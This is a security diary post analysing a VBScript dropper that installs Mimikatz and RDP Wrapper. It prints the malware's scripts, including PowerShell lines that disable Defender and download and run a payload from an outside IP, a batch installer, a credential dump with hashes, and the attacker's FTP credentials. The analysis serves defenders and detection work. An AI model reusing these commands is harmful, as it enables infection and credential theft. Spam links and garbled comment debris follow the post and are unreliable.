Simple Mimikatz & RDPWrapper Dropper

Published: 2019-08-22
Last Updated: 2019-08-23 04:55:06 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

Let’s review a malware sample that I spotted a few days ago. I found it interesting because it's not using deep techniques to infect its victims. The initial sample is a malicious VBScript. For a few weeks, I started to hunt for more Powershell based on encoded directives. The following regular expression matched on the file:

// New-Object
$enc09 = /(TmV\x33LU\x39iamVjd[A-P]|[\x2b\x2f-\x39A-Za-z][\x2b\x2f-\x39A-Za-z][\x31\x35\x39BFJNRVZdhlptx]OZXctT\x32JqZWN\x30[\x2b\x2f-\x39A-Za-z]|[\x2b\x2f-\x39A-Za-z][\x30EUk]\x35ldy\x31PYmplY\x33[Q-T])/

The initial script (SHA256:bf06b682c637d470b15e3c7b76e6d25356719286cfcc75a12bf3c31be859d2b5) is, still today, detected by only one AV engine[1]. Here is a beautified version of the script:

sDir = "C:\ProgramData\ID.dat"
Set oFSO = CreateObject("Scripting.FileSystemObject")
If oFSO.FileExists(sDir) Then
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    objFSO.DeleteFile WScript.ScriptFullName
    Dim ShaDev
    set hfhejotgbhzlzyohafchtul = createobject("")
    ShaDev = hfhejotgbhzlzyohafchtul.ExpandEnvironmentStrings("%ProgramData%")
    Set shadow=CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")
    shadow.text="... [Base64 chunk of dat] ..."
    Set sexy=CreateObject("ADODB.Stream")
    sexy.Write shadow.nodeTypedValue
    sexy.SaveToFile ShaDev & "\WindowsProtect.vbs",2

    Sub KillAll(ProcessName)
        Dim objWMIService, colProcess
        Dim strComputer, strList, p
        strComputer = "."
        Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
        Set colProcess = objWMIService.ExecQuery ("Select * from Win32_Process Where Name like '" & ProcessName & "'")
        For Each p in colProcess
    End Sub

    KillAll "cmd.exe"

    Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
        Running = False
        Set colItems = objWMIService.ExecQuery("Select * from Win32_Process")
        For Each objItem in colItems
            If objItem.Name = "cmd.exe" Then
                Running = True
                Exit For
            End If
        If Not Running Then
            Set objShell = CreateObject("Shell.Application")
            objShell.ShellExecute "cmd", "/k ""C:\ProgramData\WindowsProtect.vbs", "", "runas", 0
        End If
    Loop While Not Running
    WScript.Sleep 4000

    KillAll "cmd.exe"

    Dim fso, MyFile
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set MyFile = fso.CreateTextFile("C:\ProgramData\ID.dat", True)
    MyFile.WriteLine(" ")

    Set objFSO = CreateObject("Scripting.FileSystemObject")
    objFSO.DeleteFile WScript.ScriptFullName
End If

Not obfuscated, it is easy to understand its behaviour: First, it checks the presence of itself (if the victim has already been infected) by checking the existence of an ‘ID.dat’ file. If it exists, it removes the file and exits. Otherwise, another second-stage VBScript is decoded, dumped on disks and executed (‘WindowsProtect.vbs’). Let’s have a look at the second stage.

The decoded Base64 data (SHA256:6a25a0dbc0627e36e307e87e677e307d08982720c3dbeffe9986c3c770c37fa8)  is unknown on VT. Here is the script:

Dim x
Dim y
Dim z
x = " Set-MpPreference -DisableIOAVProtection $true"
y = " Add-MpPreference -ExclusionPath 'C:\'"
z = " -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('hxxp://92[.]53[.]91[.]141/MP3/T0R.mp3','C:\ProgramData\Isass.exe');Start-Process 'C:\ProgramData\Isass.exe'"
Dim objShell
Set objShell = WScript.CreateObject("WScript.Shell")
command = ("powershell" & x )
commany = ("powershell" & y )
commanz = ("powershell" & z )
objShell.Run command,0
objShell.Run commany,0
objShell.Run commanz,0
Set objShell = Nothing
Set objFSO = CreateObject("Scripting.FileSystemObject")
objFSO.DeleteFile WScript.ScriptFullName

The next stage is, of course, the malicious PE file (SHA256:b5cc67c06f1352039209557aa8e62e1eabefaa4646fe449326bf50f62382eacd) and is also unknown on VT. It’s a classic PE file:

root@remnux:~# exiftool Isass.exe
ExifTool Version Number         : 9.46
File Name                       : Isass.exe
Directory                       : /tmp
File Size                       : 4.6 MB
File Modification Date/Time     : 2019:08:22 14:44:24-04:00
File Access Date/Time           : 2019:08:22 14:44:23-04:00
File Inode Change Date/Time     : 2019:08:22 14:44:24-04:00
File Permissions                : rw-r--r--
File Type                       : Win32 EXE
MIME Type                       : application/octet-strea
Machine Type                    : Intel 386 or later, and compatibles
Time Stamp                      : 2017:08:11 09:54:06-04:00
PE Type                         : PE32
Linker Version                  : 14.0
Code Size                       : 188928
Initialized Data Size           : 69632
Uninitialized Data Size         : 0
Entry Point                     : 0x1cec9
OS Version                      : 5.1
Image Version                   : 0.0
Subsystem Version               : 5.1
Subsystem                       : Windows GUI

The PDB path ('D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb') discloses that the PE file is a self-extracting archive. Program Data Base files are used to keep debugging info about a program when it is compiled. The PDB stores many interesting data like symbols, addresses, names of resources etc. 

SFX files can execute a script once the content is unpacked. Easy to detect in the PE strings:

root@remnux:~# strings Isass.exe | grep Setup=
Setup=%SystemDrive%\Intel\Logs\h32.exe %SystemDrive%\Intel\Logs\beforeinstall.bat

Here is an extract of the script:

@echo off
set CURRENTPATH=%SystemDrive%\Intel\Logs
set INSTALLPATH=%SystemDrive%\ProgramData\Microsoft\Windows\Updates

del /F /Q %INSTALLPATH%\install.bat
move /Y %CURRENTPATH%\h64.exe %INSTALLPATH%\h64.exe
move /Y %CURRENTPATH%\h32.exe %INSTALLPATH%\h32.exe
move /Y %CURRENTPATH%\zip.exe %INSTALLPATH%\zip.exe
move /Y %CURRENTPATH%\ncftpput.exe %INSTALLPATH%\ncftpput.exe
move /Y %CURRENTPATH%\ftps.cfg %INSTALLPATH%\ftps.cfg
move /Y %CURRENTPATH%\install.bat %INSTALLPATH%\install.bat
move /Y %CURRENTPATH%\mimitask.bat %INSTALLPATH%\mimitask.bat

reg Query "HKLM\Hardware\Description\System\CentralProcessor\0" | find /i "x86" > NUL && set OS=32BIT || set OS=64BIT

if %OS%==32BIT set hidexe=h32.exe
if %OS%==64BIT set hidexe=h64.exe

%hidexe% install.bat >> %INSTALLPATH%\Service\install.log 2>>&1

rmdir /S /Q %CURRENTPATH%\Tor
rmdir /S /Q %CURRENTPATH%\Data
rmdir /S /Q %CURRENTPATH%\Tor
DEL /Q /F %CURRENTPATH%\ncftpput.exe
DEL /Q /F %CURRENTPATH%\ftps.cfg
DEL /Q /F %CURRENTPATH%\install.bat
DEL /Q /F %CURRENTPATH%\mimitask.bat
DEL /Q /F  "%~f0" > NUL

You can see that many files are dropped on the infected computer. The more interesting ones are:

  • ncftpput.exe
  • ftps.cfg
  • mimikatz.bat
  • install.bat
  • ToR package

The ‘install.bat’ script is also very interesting (SHA256:550e8e6fcfc4db2139dfa2e6e4f26e881b405e21b752a750d4cc682da0361567) and also unknow on VT. Too big to be posted here, here is an overview of its features:

  • Check the geographical location of the victim via different GeoIP services
  • Create a new administrator user ('Admlnlstrator') with the following password: ‘Zhopka222222'
  • Disable Windows Defender
  • Install RDP Wrapper library[2]
  • Dump credentials via Mimikatz
  • Install a scheduled task to re-execute Mimikatz and exfiltrate data at each boot time.

The RDP wrapper is fetched from another site: hxxp://yourdatafor[.]me:94/azaza/:

Collected data are exfiltrated via FTP (FTP is still alive!) via the ncftpput.exe tool. The configuration is present in the archive in the ftps.cfg file:

root@remnux:~# cat ftps.cfg
user ftpuser
pass Super123123

Yes, even attackers use weak passwords! The server is not protected and allows to download all files collected from victims. The domain '' has been registered on July 16th 2019.

I synchronized them during a few days (now the FTP server is down). For each victim, two files were uploaded:

The first one contains the malware installation logs:

root@remnux:~# unzip -t
    testing: Program Files/RDP Wrapper/hostname.log   OK
    testing: Program Files/RDP Wrapper/installer.log   OK
    testing: Program Files/RDP Wrapper/tor_install.log   O
No errors detected in compressed data of

The second one contains the output of Mimikatz:

root@remnux:~# unzip -t
    testing: ProgramData/Microsoft/NetFramework/Test/credoz.txt   OK
No errors detected in compressed data of

Each archive contains the same file 'credoz.txt':

root@remnux:~# head -30 credoz.txt
Hostname: [redacted] / authority\system-authority\system

  .#####.   mimikatz 2.1.1 (x64) #17763 Feb 23 2019 12:03:02
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( )
 ## \ / ##       >
 '## v ##'       Vincent LE TOUX             ( )
  '#####'        > /   ***/

mimikatz(powershell) # sekurlsa::logonpasswords

Authentication Id : 0 ; 2254335948 (00000000:865e6fcc)
Session           : RemoteInteractive from 2
User Name         : Admlnlstrator
Domain            : [redacted]
Logon Server      : [redacted]
Logon Time        : 2019/08/17 19:33:43
SID               : S-1-5-21-2984074050-2788484596-579673664-1006
        msv :
         [00000003] Primary
         * Username : Admlnlstrator
         * Domain   : [redacted]
         * NTLM     : eddcae2f04515b3a77e37ff4f5d2878d
         * SHA1     : 0a19e0af02162b596b2bc58f0c9f26c1ddfad698
         [00010000] CredentialKeys
         * NTLM     : eddcae2f04515b3a77e37ff4f5d2878d
         * SHA1     : 0a19e0af02162b596b2bc58f0c9f26c1ddfad698
        tspkg :
        wdigest :
         * Username : Admlnlstrator

You can see that the rogue administrator account has been used. In one week, I collected 188 credential files from the FTP server! Based on the re-upload of new files at every reboot, the number of unique victims is 53:

root@remnux:~# ls -1 creds/*.zip|awk -F "_" '{ print $1 }'|sort -u|wc -l

Did you see the same kind of activity? Do you have more information about this malware? Feel free to share!


Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant

0 comment(s)
ISC Stormcast For Thursday, August 22nd 2019


What's this all about ..?
password reveal .
<a hreaf="">the social network</a> is described as follows because they respect your privacy and keep your data secure:

<a hreaf="">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.

<a hreaf="">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
<a hreaf=""> public bathroom near me</a>
<a hreaf=""> nearest public toilet to me</a>
<a hreaf=""> public bathroom near me</a>
<a hreaf=""> public bathroom near me</a>
<a hreaf=""> nearest public toilet to me</a>
<a hreaf=""> public bathroom near me</a>
Enter comment here... a fake TeamViewer page, and that page led to a different type of malware. This week's infection involved a downloaded JavaScript (.js) file that led to Microsoft Installer packages (.msi files) containing other script that used free or open source programs.
distribute malware. Even if the URL listed on the ad shows a legitimate website, subsequent ad traffic can easily lead to a fake page. Different types of malware are distributed in this manner. I've seen IcedID (Bokbot), Gozi/ISFB, and various information stealers distributed through fake software websites that were provided through Google ad traffic. I submitted malicious files from this example to VirusTotal and found a low rate of detection, with some files not showing as malware at all. Additionally, domains associated with this infection frequently change. That might make it hard to detect.
Enter corthrthmment here...

Diary Archives